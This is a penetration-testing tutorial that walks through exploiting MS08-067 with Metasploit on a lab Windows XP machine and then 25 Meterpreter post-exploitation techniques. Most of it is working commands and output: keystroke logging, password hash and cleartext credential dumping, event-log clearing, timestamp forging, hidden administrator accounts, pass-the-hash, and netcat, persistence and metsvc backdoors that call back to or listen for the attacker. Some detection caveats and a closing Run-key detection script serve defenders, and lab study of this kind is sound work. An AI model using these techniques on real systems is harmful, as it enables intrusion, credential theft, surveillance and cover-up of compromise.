
Penetration Testing: 25 Meterpreter Post-Exploitation Techniques

Date: 2023-10-26 16:51:46


Contents
0. Lab environment
1. MS08-067 vulnerability description (RPC)
2. Host discovery
3. Exploiting the target through MS08-067 with MSF
4. Post-exploitation
4.1 System information gathering: (1) basic system info (2) is the target a virtual machine (3) disk partitions (4) installed software (5) other information
4.2 Checking privileges
4.3 Entering the target's shell
4.4 Adding an account
4.5 Adding the new account to the Administrators group
4.6 Screenshot
4.7 File upload
4.8 File download
4.9 Dumping password hashes
4.10 Webcam
4.11 Keystroke capture: (1) find a suitable process with ps and migrate (2) capture keystrokes
4.12 Disabling the target's keyboard or mouse
4.13 Clearing logs
4.14 Finding files
4.15 Forging timestamps: (1) view timestamps (2) copy help.gif's timestamps onto iisstart.asp
4.16 Target network information gathering
4.17 Adding a route to the target network and scanning: (1) ARP scan (2) port scan
4.18 Dumping credentials with mimikatz/kiwi
4.19 Remote desktop: (1) enable RDP and add a user (2) connect to the target over RDP
4.20 Capturing traffic on the target
4.21 Planting a backdoor through the registry: (1) upload nc (2) enumerate the Run key (3) set the value (4) query the value (5) connect to the backdoor
4.22 Token manipulation: (1) token impersonation (2) token stealing
4.23 Hash abuse: (1) dump hashes (2) pass-the-hash
4.24 Backdoor implants: (1) persistence Run-key backdoor (2) metsvc service backdoor
4.25 Reboot/shutdown

This article uses MS08-067 as the entry point and records commonly used post-exploitation techniques, from simple information gathering through to planting backdoors.

0. Lab environment

Subnet: 192.168.155.0/24

NIC mode: NAT

Attacker 1, Kali: 192.168.155.2

Attacker 2, macOS host: 192.168.155.1

Target 1, Windows XP SP3 (English): 192.168.155.18

Target 2, Windows 7: 192.168.155.19

1. MS08-067 vulnerability description (RPC)

MS08-067 (CVE-2008-4250) is a buffer overflow in the RPC request handling of the Windows Server service. A remote attacker triggers the overflow by sending a crafted RPC request to the Server service (reachable over SMB, TCP 445 or 139); the result is complete compromise of the system, with arbitrary code executed as SYSTEM.

On Windows 2000, XP and Server the vulnerability can be exploited without authentication; on Windows Vista and Server, authentication may be required.

Official bulletin: /en-us/security-updates/securitybulletins//ms08-067

2. Host discovery

nmap -F 192.168.155.0/24

Starting Nmap 7.91 ( ) at -05-03 03:50 EDT
Nmap scan report for 192.168.155.1
Host is up (0.00084s latency).
Not shown: 97 closed ports
PORT      STATE SERVICE
53/tcp    open  domain
5000/tcp  open  upnp
49152/tcp open  unknown
MAC Address: FA:FF:C2:C2:93:64 (Unknown)

Nmap scan report for 192.168.155.18
Host is up (0.0018s latency).
Not shown: 93 closed ports
PORT     STATE SERVICE
25/tcp   open  smtp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
MAC Address: 00:0C:29:50:ED:13 (VMware)

Nmap scan report for 192.168.155.2
Host is up (0.0000060s latency).
All 100 scanned ports on 192.168.155.2 are closed

Nmap done: 256 IP addresses (3 hosts up) scanned in 2.23 seconds

Target host: 192.168.155.18

Open ports on the target:

PORT     STATE SERVICE
25/tcp   open  smtp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
MAC Address: 00:0C:29:50:ED:13 (VMware)

Target port: 445

Service: microsoft-ds (SMB, which is how the Server service's RPC interface is reached)

3. Exploiting the target through MS08-067 with MSF

msfconsole
msf6 > search ms08-067
msf6 > use exploit/windows/smb/ms08_067_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > show targets
msf6 exploit(windows/smb/ms08_067_netapi) > set target 0
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.155.18
msf6 exploit(windows/smb/ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > exploit

Target 0 is "Automatic Targeting": the module fingerprints the OS and language over SMB and picks the matching return address. LHOST is not set explicitly here, so the reverse handler binds to Kali's default interface address (192.168.155.2) and the default port 4444, as the output confirms:

[*] Started reverse TCP handler on 192.168.155.2:4444
[*] 192.168.155.18:445 - Automatically detecting the target...
[*] 192.168.155.18:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.155.18:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.155.18:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.155.18
[*] Meterpreter session 1 opened (192.168.155.2:4444 -> 192.168.155.18:1074) at -05-03 04:42:05 -0400

4. Post-exploitation

4.1 System information gathering

The information-gathering post modules live in the directories below; only a few examples are shown here.

/usr/share/metasploit-framework/modules/post/windows/gather
/usr/share/metasploit-framework/modules/post/linux/gather

(1) Basic system information

meterpreter > sysinfo

Computer        : DH-CA8822AB9589
OS              : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

If the target runs SP2, which Microsoft stopped maintaining long ago, it will carry a large number of unpatched vulnerabilities (XP SP3 itself has been out of support since April 2014).

(2) Is the target a virtual machine

meterpreter > run post/windows/gather/checkvm

[*] Checking if DH-CA8822AB9589 is a Virtual Machine ...
[+] This is a VMware Virtual Machine

(3) Disk partitions

meterpreter > run post/windows/gather/forensics/enum_drives

Device Name          Type  Size (bytes):
-----------          ----  -------------
<Physical Drives:>
\\.\PhysicalDrive0         4702111234474983745
<Logical Drives:>
\\.\A:                     4702111234474983745
\\.\C:                     4702111234474983745
\\.\D:                     4702111234474983745

The identical size values reported here are clearly bogus (about 4.7 exabytes each); treat the module's size column as unreliable on this target and use the drive list only.

(4) Installed software

meterpreter > run post/windows/gather/enum_applications

[*] Enumerating applications installed on DH-CA8822AB9589

Installed Applications
======================

Name                                 Version
----                                 -------
Adobe Reader 9                       9.0.0
KingView 6.53                        6.53
KingView Driver                      6.53
Microsoft Office Standard Edition    11.0.8173.0
Sentinel Protection Installer 7.5.0  7.5.0
VMware Tools                         8.1.4.11056
WebFldrs XP                          9.50.7523

[+] Results stored in: /root/.msf4/loot/0505234757_default_192.168.155.18_host.application_805792.txt

(5) Other information gathering

run post/windows/gather/dumplinks           # recently opened files (LNK artefacts)
run post/linux/gather/checkvm               # virtual machine check (Linux targets)
run post/windows/gather/checkvm             # virtual machine check
run post/windows/gather/enum_ie             # IE history, cookies and saved credentials
run post/windows/gather/enum_chrome         # Chrome data
run post/windows/gather/enum_patches        # installed patches
run post/windows/gather/forensics/enum_drives  # partitions
run post/windows/gather/enum_domain         # locate the domain controller
run post/windows/gather/enum_applications   # installed software

4.2 Checking privileges

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

The session runs as SYSTEM, as expected from a Server-service exploit.

4.3 Entering the target's shell

meterpreter > shell

Process 3980 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

We now have a cmd.exe shell on the target.

4.4 Adding an account

C:\WINDOWS\system32>net user sxk /add

The command completed successfully.

4.5 Adding the new account to the Administrators group

C:\WINDOWS\system32>net localgroup administrators sxk /add

The command completed successfully.

The user is now a member of the target's Administrators group. Note that account creation and group changes are among the noisiest things you can do on a host: with auditing enabled they produce "user account created" and "member added to local group" events in the Security log (IDs 624/636 on XP and 2003, 4720/4732 on Vista and later).

4.6 Screenshot

meterpreter > screenshot

Screenshot saved to: /root/Desktop/YhioHCHD.jpeg

4.7 File upload

meterpreter > upload /Users/sxk/MYSHXRuM.jpeg

[*] uploading  : /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg
[*] Uploaded 260.89 KiB of 260.89 KiB (100.0%): /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg
[*] uploaded   : /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg

meterpreter > pwd

C:\Windows\system32

With no destination given, upload writes into the session's current working directory on the target, here C:\Windows\system32.

4.8 File download

meterpreter > download drivers/etc/hosts

[*] Downloading: drivers/etc/hosts -> /Users/xiaokaisi/hosts
[*] Downloaded 854.00 B of 854.00 B (100.0%): drivers/etc/hosts -> /Users/xiaokaisi/hosts
[*] download   : drivers/etc/hosts -> /Users/xiaokaisi/hosts

The path is relative to the current directory (C:\Windows\system32), so this fetched the target's hosts file.

4.9 Dumping password hashes

meterpreter > hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
client:1000:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Each line is user:RID:LM hash:NT hash:::. Before sending anything to a cracker, read what is already there: aad3b435b51404eeaad3b435b51404ee in the LM field on every line is the LM hash of an empty string, meaning LM hashes are not stored; 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password, so Administrator and Guest have blank passwords. The only hash that actually needs cracking is:

259745cb123a52aa2e693aaacca2db52

hashdump needs a SYSTEM session, because it reads the SAM and SYSTEM hives through the registry.

4.10 Webcam

meterpreter > webcam_list        # list webcams
[-] No webcams were found
meterpreter > webcam_snap        # take a picture
[-] Target does not have a webcam
meterpreter > webcam_stream      # stream video
[-] Target does not have a webcam

4.11 Keystroke capture

To record the keystrokes of a particular user, say Administrator, Meterpreter has to run inside a process on that user's desktop, so migrate into one of that user's processes first. The capture is bound to the desktop the Meterpreter process is attached to, not to its privilege level: the SYSTEM session spawned by the exploit sits outside the interactive user's desktop and sees nothing, even though SYSTEM is the higher privilege.

After keyscan_start has switched the sniffer on, keyscan_dump pulls out what has been recorded; run keyscan_stop only once you no longer need the capture. The order matters: dump first, then stop, not the other way round, because stopping discards the buffer.

(1) Find a suitable process with ps and migrate

meterpreter > ps

3668  3608  explorer.exe    (the usual choice: it runs on the logged-on user's desktop)

meterpreter > migrate 3668

[*] Migrating from 1048 to 3668...
[*] Migration completed successfully.

meterpreter > getuid

Server username: client-PC\client

After migration the session runs as the desktop user, which is why getuid no longer reports SYSTEM.

(2) Capture keystrokes

meterpreter > keyscan_start

Starting the keystroke sniffer ...

meterpreter > keyscan_dump

Dumping captured keystrokes...
wo shi client ,<Shift>Ilove china<CR>

meterpreter > keyscan_stop

Stopping the keystroke sniffer...

The user's keystrokes on the target were captured: "wo shi client ,Ilove china".

4.12 Disabling the target's keyboard or mouse

uictl [enable/disable] [keyboard/mouse/all]   # enable or disable keyboard/mouse input
uictl disable keyboard                        # disable the keyboard
uictl disable mouse                           # disable the mouse

4.13 Clearing logs

Clears the Windows Application, System and Security event logs:

clearev

Clearing the Security log is itself recorded: Windows writes an "audit log was cleared" event (ID 517 on XP and 2003, 1102 on Vista and later), which is one of the most reliable indicators of tampering a defender can alert on.

4.14 Finding files

meterpreter > cd C:\\
meterpreter > pwd

C:\

meterpreter > search -f *hosts*

4.15 Forging timestamps

meterpreter > pwd

C:\Inetpub\wwwroot

meterpreter > ls

Listing: C:\Inetpub\wwwroot
===========================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  342    fil   2001-07-21 14:22:32 +0800  help.gif
100666/rw-rw-rw-  1898   fil   2001-08-10 14:19:20 +0800  iisstart.asp
100666/rw-rw-rw-  8923   fil   2001-08-10 14:19:20 +0800  localstart.asp
100666/rw-rw-rw-  356    fil   2001-07-21 14:22:32 +0800  mmc.gif
100666/rw-rw-rw-  2806   fil   2001-07-21 14:22:32 +0800  pagerror.gif
100666/rw-rw-rw-  1046   fil   2001-07-21 14:22:32 +0800  print.gif
100666/rw-rw-rw-  1577   fil   2001-07-21 14:22:32 +0800  warning.gif
100666/rw-rw-rw-  1182   fil   2001-07-21 14:22:32 +0800  web.gif
100666/rw-rw-rw-  11946  fil   2001-07-21 14:22:32 +0800  winxp.gif

(1) View timestamps

meterpreter > timestomp -v help.gif

[*] Showing MACE attributes for help.gif
Modified      : 2001-07-21 14:22:32 +0800
Accessed      : -09-28 11:40:15 +0800
Created       : -09-28 11:40:15 +0800
Entry Modified: -09-28 11:40:28 +0800

meterpreter > timestomp -v iisstart.asp

[*] Showing MACE attributes for iisstart.asp
Modified      : 2001-08-10 14:19:20 +0800
Accessed      : -09-28 11:40:15 +0800
Created       : -09-28 11:40:15 +0800
Entry Modified: -09-28 11:40:28 +0800

(2) Copy help.gif's timestamps onto iisstart.asp

This uses timestomp's -f option, which sets all four MACE values (Modified, Accessed, Created, Entry Modified) of the target file to those of the file supplied. Viewing iisstart.asp again afterwards shows the same values as help.gif, so its timestamps have been tampered with.

Caveat: timestomp only rewrites the $STANDARD_INFORMATION timestamps that Explorer and the Win32 API expose. The copies kept in the file's $FILE_NAME attribute in the NTFS MFT are not touched, so a forensic examiner who compares the two sets will spot the inconsistency.

4.16 Target network information gathering

ipconfig / ifconfig   # IP configuration
netstat -ano          # listening ports and connections with owning PIDs
arp                   # ARP cache
getproxy              # proxy settings
route                 # routing table

4.17 Adding a route to the target network and scanning

(1) ARP scan

(2) Port scan

4.18 Dumping credentials with mimikatz/kiwi

The kiwi extension must first be loaded with load kiwi; it needs a SYSTEM session whose architecture matches the target (x86 here).

meterpreter > creds_wdigest

[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

Username          Domain           Password
--------          ------           --------
DH-CA8822AB9589$  WORKGROUP        (null)
sxk               DH-CA8822AB9589

The WDigest provider on these Windows versions keeps the logon password of every logged-on user in cleartext in LSASS memory, which is what creds_wdigest reads out. The same can be done with the full mimikatz syntax:

meterpreter > kiwi_cmd sekurlsa::logonPasswords

4.19 Remote desktop

List the available desktops:

meterpreter > enumdesktops

Show the desktop the current Meterpreter session is attached to:

meterpreter > getdesktop

Session 0\S\D

(1) Enable RDP and add a user

The module lives at

/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb

Reading enable_rdp.rb shows what it does under the hood: RDP is enabled by editing the registry with reg (the Terminal Server fDenyTSConnections value); the user is added by running net user through cmd.exe; and the port forward uses Meterpreter's portfwd command.

meterpreter > run post/windows/manage/enable_rdp

[*] Enabling Remote Desktop
[*]     RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*]     The Terminal Services service is not set to auto, changing it to auto ...
[*]     Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/0506025923_default_192.168.155.18_host.windows.cle_712463.txt

Add a user:

run post/windows/manage/enable_rdp USERNAME=lyl PASSWORD=123456

[*] Enabling Remote Desktop
[*]     RDP is already enabled
[*] Setting Terminal Services service startup mode
[*]     Terminal Services service is already set to auto
[*]     Opening port in local firewall if necessary
[*] Setting user account for logon
[*]     Adding User: lyl with Password: 123456
[*]     Adding User: lyl to local group 'Remote Desktop Users'
[*]     Hiding user from Windows Login screen
[*]     Adding User: lyl to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/0506030102_default_192.168.155.18_host.windows.cle_669035.txt

Set up a port forward:

run post/windows/manage/enable_rdp FORWARD=true LPORT=6662

[*] Enabling Remote Desktop
[*]     RDP is already enabled
[*] Setting Terminal Services service startup mode
[*]     Terminal Services service is already set to auto
[*]     Opening port in local firewall if necessary
[*] Starting the port forwarding at local port 6662
[*] Local TCP relay created: 0.0.0.0:6662 <-> 127.0.0.1:3389
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/0506030321_default_192.168.155.18_host.windows.cle_270181.txt

Each run writes a cleanup resource file under /root/.msf4/loot; running it afterwards reverts the registry, service, firewall and account changes.

(2) Connect to the target over RDP

rdesktop 127.0.0.1:6662

4.20 Capturing traffic on the target

meterpreter > use sniffer

Loading extension sniffer...Success.

meterpreter > sniffer_interfaces

1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )

meterpreter > sniffer_start 1

[*] Capture started on interface 1 (50000 packet buffer)

meterpreter > sniffer_stats 1

[*] Capture statistics for interface 1
        packets: 18
        bytes: 1098

meterpreter > sniffer_dump 1 /tmp/msf-sniffer-test.pcap

[*] Flushing packet capture buffer for interface 1...
[*] Flushed 139 packets (12986 bytes)
[*] Downloaded 100% (12986/12986)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/msf-sniffer-test.pcap

meterpreter > sniffer_stop 1

[*] Capture stopped on interface 1
[*] There are 12 packets (732 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'

The capture buffer lives in the target's memory and is only transferred when sniffer_dump is called, so dump regularly before the 50000-packet buffer fills. The resulting /tmp/msf-sniffer-test.pcap is the target host's traffic and opens directly in Wireshark.

4.21 Planting a backdoor through the registry

(1) Upload nc

meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

[*] uploading  : /usr/share/windows-binaries/nc.exe -> C:\windows\system32
[*] uploaded   : /usr/share/windows-binaries/nc.exe -> C:\windows\system32\nc.exe

(2) Enumerate the Run key

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

Enumerating: HKLM\software\microsoft\windows\currentversion\run

  Keys (1):
        OptionalComponents

  Values (4):
        VMware Tools
        VMware User Process
        ICQ Lite
        Adobe Reader Speed Launcher

meterpreter >

(3) Set the value

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v msf_test_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'

Successfully set msf_test_nc of REG_SZ.

(4) Query the value

reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v msf_test_nc

Key: HKLM\software\microsoft\windows\currentversion\run
Name: msf_test_nc
Type: REG_SZ
Data: C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe

(5) Connect to the backdoor

Values under HKLM\...\Run execute at every interactive logon, for any user, so the backdoor is live as soon as someone logs on (not at boot): nc then listens on TCP 443 (-L makes it re-listen after each disconnect) and hands a cmd.exe to whoever connects. Connecting from the attacker with nc to 192.168.155.18 port 443 yields a shell, and the backdoor is in place.

Two caveats a practitioner should keep in mind: this is an unauthenticated bind shell open to anyone who can reach port 443, and a plain-text Run value pointing at nc.exe is trivial for any autorun-auditing tool (Sysinternals Autoruns, for example) to spot.

4.22 Token manipulation

(1) Token impersonation

meterpreter > use incognito

Loading extension incognito...Success.

meterpreter > help incognito

List the available tokens:

meterpreter > list_tokens -u

Impersonate the DH-CA8822AB9589\sxk token:

impersonate_token 'DH-CA8822AB9589\sxk'

Run cmd under the impersonated token:

execute -f cmd.exe -i -t

Return to the original token:

rev2self

meterpreter > getuid
Server username: DH-CA8822AB9589\sxk
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Impersonation needs a session with SeImpersonatePrivilege, which SYSTEM has; list_tokens separates delegation tokens (usable for network authentication to other hosts) from impersonation tokens (valid on the local machine only).

(2) Token stealing

ps

Steal the token from a specific process:

meterpreter > steal_token 1648

Stolen token with username: DH-CA8822AB9589\sxk

meterpreter > getuid

Server username: DH-CA8822AB9589\sxk

Drop the stolen token:

meterpreter > drop_token

Relinquished token, now running as: NT AUTHORITY\SYSTEM

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM
meterpreter >

4.23 Hash abuse

(1) Dump hashes

Dump the password hashes from the SAM (requires SYSTEM):

meterpreter > run post/windows/gather/smart_hashdump

(2) Pass-the-hash

With a user's hash from smart_hashdump, the psexec module can authenticate with the hash directly, without knowing the password.

Prerequisites: (1) SMB reachable on port 445; (2) the ADMIN$ share enabled, and the account used must be a local administrator on the target, because psexec installs and starts a service through it.

The procedure is as follows. SMBPass takes the LM and NT halves joined with a colon, exactly as hashdump prints them.

msf > use exploit/windows/smb/psexec
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.155.2
msf > set LPORT 4443
msf > set RHOST 192.168.155.18
msf > set SMBUser Administrator
msf > set SMBPass aad3b4*****04ee:5b5f00*****c424c
msf > set SMBDomain WORKGROUP      # for a domain user set SMBDomain to the domain
msf > exploit

4.24 Backdoor implants

Metasploit's built-in backdoors start in one of two ways: from a start-up entry (persistence) or as a Windows service (metsvc). persistence_exe additionally lets you plant an executable of your own choosing.

(1) persistence Run-key backdoor

The script uploads a VBS file to C:\Users***\AppData\Local\Temp\ and adds a start-up entry under HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ that runs it.

meterpreter > run persistence -X -i 5 -p 6667 -r 192.168.155.2

-X registers the Run-key entry so the agent starts at logon, -i 5 makes it retry the connection every 5 seconds, and -p/-r give the handler port and host. The persistence meterpreter script has been deprecated in newer Metasploit releases in favour of the post/windows/manage/persistence_exe module, which does the same job.

Connecting to the backdoor:

msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.155.2
msf > set LPORT 6667
msf > exploit

(2) metsvc service backdoor

Three files (metsrv.x86.dll, metsvc-server.exe, metsvc.exe) are uploaded to C:\Users***\AppData\Local\Temp\ and started through a Windows service named "meterpreter":

run metsvc -A

Connecting to the backdoor:

msf > use exploit/multi/handler
msf > set payload windows/metsvc_bind_tcp
msf > set RHOST 192.168.155.18
msf > set LPORT 31337
msf > exploit

The handler connects to the service. Bear in mind that metsvc is a bind listener on TCP 31337 with no authentication at all: anyone on the network who finds the port gets a SYSTEM Meterpreter, so it should never be left behind after an engagement.

At this point three backdoors have been planted on the target: the nc Run-key entry, the persistence agent, and the metsvc service.
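The following is an added detection-side example for sections 4.21 and 4.24; it is not code from the original post. Both sections leave a value under HKLM\...\Run, so one check covers them: parse the plain-text output of reg query for that key and flag entries whose command line looks like a network listener or shell, or that run a script host from a user-writable directory. The sample output is constructed for this example (the format assumed is what reg.exe prints, with columns separated by runs of spaces): the benign entries mirror the values enumerated in 4.21, msf_test_nc is the nc.exe bind shell from 4.21, and persist stands in for the persistence script's VBS from 4.24, whose real file name is random.

```python
"""Added example for 4.21 and 4.24: flag suspicious autoruns in 'reg query' output."""
import ntpath
import re

# Constructed sample of 'reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' output.
SAMPLE_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    VMware Tools    REG_SZ    "C:\Program Files\VMware\VMware Tools\VMwareTray.exe"
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\VMwareUser.exe"
    Adobe Reader Speed Launcher    REG_SZ    "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
    msf_test_nc    REG_SZ    C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe
    persist    REG_SZ    wscript.exe //B C:\Users\client\AppData\Local\Temp\XyZabc.vbs
"""

LISTENER_BINS = {"nc.exe", "nc64.exe", "ncat.exe", "netcat.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe"}
USER_WRITABLE = re.compile(r"\\(temp|tmp|appdata|users\\public|programdata|downloads)\\", re.I)
VALUE_RE = re.compile(r"^\s+(?P<name>.+?)\s{2,}(?P<type>REG_\w+)\s+(?P<data>.*?)\s*$")


def parse_reg_query(text):
    """Yield (key, value name, type, data) for every value line under each key header."""
    key = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():          # key header lines are not indented
            key = line.strip()
            continue
        m = VALUE_RE.match(line)
        if m:
            yield key, m["name"], m["type"], m["data"]


def split_command(data):
    """Split a Run value into (executable, arguments), honouring a quoted path."""
    m = re.match(r'\s*"([^"]+)"\s*(.*)|\s*(\S+)\s*(.*)', data)
    if m.group(1) is not None:
        return m.group(1), m.group(2)
    return m.group(3), m.group(4)


def assess(data):
    """Return the reasons an autorun command line looks suspicious (empty if none)."""
    exe, args = split_command(data)
    base = ntpath.basename(exe).lower()
    reasons = []
    if base in LISTENER_BINS:
        reasons.append("network tool %s set to autorun" % base)
        if re.search(r"(^|\s)-[a-zA-Z]*[lL]", args):
            reasons.append("listening mode flag (bind shell)")
    if re.search(r"(^|\s)-e\s+\S*(cmd|powershell|sh)(\.exe)?\b", args, re.I):
        reasons.append("-e spawns a shell on connect")
    if base in SCRIPT_HOSTS:
        reasons.append("script host / LOLBin %s in Run key" % base)
    if USER_WRITABLE.search(data):
        reasons.append("runs from a user-writable directory")
    return reasons


def find_suspicious_autoruns(text=SAMPLE_OUTPUT):
    """Map value name -> reasons for every flagged entry in the reg query output."""
    findings = {}
    for _key, name, _type, data in parse_reg_query(text):
        reasons = assess(data)
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in find_suspicious_autoruns().items():
        print(name, "->", "; ".join(reasons))
```

On the sample this flags msf_test_nc (network tool, listening flag, -e shell) and persist (script host, user-writable path) and stays quiet on the VMware and Adobe entries. The same checks apply to the HKCU Run key and the RunOnce keys, and a real audit should also compare each executable's hash against the vendor package, since an attacker can just as well overwrite a legitimate autorun target.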

4.25 Reboot/shutdown

Finally, a simple one:

reboot / shutdown

Reboots or shuts down the target machine.
